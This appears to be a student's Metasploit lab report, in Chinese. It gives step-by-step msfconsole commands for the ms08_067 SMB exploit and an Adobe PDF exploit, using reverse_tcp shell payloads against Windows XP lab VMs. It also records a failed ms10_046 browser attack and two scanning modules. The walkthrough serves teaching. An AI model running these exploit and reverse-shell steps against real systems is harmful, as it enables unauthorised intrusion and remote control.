20155205 郝博雅 Exp5 MSF基础应用
Posted 郝博雅
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了20155205 郝博雅 Exp5 MSF基础应用相关的知识,希望对你有一定的参考价值。
20155205 郝博雅 Exp5 MSF基础应用
一、实验目标
-
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
1.一个主动攻击实践,如ms08_067; (1分)
-
一个针对浏览器的攻击,如ms11_050;(1分)
-
一个针对客户端的攻击,如Adobe;(1分)
-
成功应用任何一个辅助模块。(0.5分)
-
基础问题回答:用自己的话解释什么是exploit,payload,encode?
- exploit相当于一个载体,把攻击代码运送到耙机中;payload相当于shellcode;encode一是为了避免payload中出现坏字符,从而影响payload的功能,二是为了实现免杀。
二、实验内容
主动攻击:ms08_067漏洞攻击
靶机: windows XP SP3(English)
攻击机:kali
- 输入
msfconsole
进入控制台,输入search ms08_067
指令查询一下针对该漏洞可以运用的攻击模块:
- 输入
use exploit/windows/smb/ms08_067_netapi
使用该模块:
- 使用
show payloads
查看可以供我们使用的payload
并找到一个可用的攻击载荷:
-
用
set payload generic/shell_reverse_tcp
即tcp反向回连设置payload
。 -
使用指
令show options
查看我们需要设置的参数,需要设置一个RHOST(靶机的IP地址)和一个LHOST(攻击机的IP地址)。并且看到target是0,即自动选择目标系统类型,就不用再设置了。
- 使用
set LHOST 192.168.206.129
和set LPORT 5205
设置本机地址和端口,使用set RHOST 192.168.206.135
设置耙机地址,使用show options
查看设置结果:
- 接着使用
exploit
指令开始攻击,出现了一个错误:
- 关闭XP的防火墙:
- 攻击成功,获取了耙机的shell:
对浏览器攻击:ms10_046漏洞攻击
攻击机:kali
靶机:windowsXP Professional sp2
IE:8.0
- 先
search ms10_046
指令查看可以运用的攻击模块,进入模块后将SRVHOST和LHOST填攻击机的IP地址,在ip浏览器中输入生成的URL后会出错:
- 这个错误很多人都遇到了,也没有解决,算一个失败的例子吧,不过老师不是说攻击百分之九十都是失败么
对Adobe的漏洞攻击:adobe_toolbutton
攻击机:kali
靶机:windowsXP Professional sp2
Adobe版本:9.3
- 先输入
search adobe
查询针对adobe攻击的模块,使用use exploit/windows/fileformat/adobe_toolbutton
,使用set payload windows/meterpreter/reverse_tcp
设置payload
show options
看一下需要设置的参数
- 设置好参数后输入
exploit
开始攻击,可以看到生成了pdf文件。
- 将pdf文件拷到xp里,在kali上输入back退出当前模块,进入监听模块
- 在靶机上打开pdf文件
- 可以看到攻击成功,获取了xp的shell
- 强行关闭了pdf文件后,可以看到监听的会话被关闭了。
辅助模块的应用1:arp_sweep
-
先使用
show auxiliary
查看w所有的辅助模块以及他们的用途,在metasploit中,辅助模块的用途非常广泛,他们可以是扫描器/拒绝服务攻击工具/fuzz测试器,以及其他类型的工具。 -
模块实在是太多了,找了很多个但搜索了一下做起来都比较困难,因此使用
show scanner
找一个比较简单一点的,最后选择了arp_sweep
。可以参考(MSF内网渗透 扫描模块) -
arp_sweep
使用ARP请求枚举本地局域网络中的所有活跃主机进行扫描。进入模块后查询一下参数
msf > use auxiliary/scanner/discovery/arp_sweep ---进入arp_sweep 模块
msf auxiliary(arp_sweep) > show options ---查询模块参数
之后进行参数设置
msf auxiliary(arp_sweep) > set RHOSTS 10.10.10.0/24--用set进行hosts主机段设置
RHOSTS => 10.10.10.0/24
msf auxiliary(arp_sweep) > set THREADS 50 --加快扫描速度
THREADS => 50
msf auxiliary(arp_sweep) > run --执行run进行扫描
- 因为我只开了一个虚拟机,所以只扫到了一个活跃机。
- 但里面那个
10.43.32.1 appears to be up (USC INFORMATION SCIENCES INST).
是啥呢??查了一下后面英文的意思是加利福尼亚大学洛杉矶分校。。。
辅助模块的应用2:ipidseq
- 功能:扫描网段中的存活ip,它会识别被发现主机的IPID(用于跟踪IP包的次序的一种技术)序列模式,并且表示出哪些是0、随机或递增的。
- 老规矩,先
search ipidseq
后选择相应模块,查看需要设置的参数:
- 设置参数后exploit,扫描成功
- 还可以扫描一个网段,因为等待时间太长了只截了部分结果:
db_autopwn实战
以上是关于20155205 郝博雅 Exp5 MSF基础应用的主要内容,如果未能解决你的问题,请参考以下文章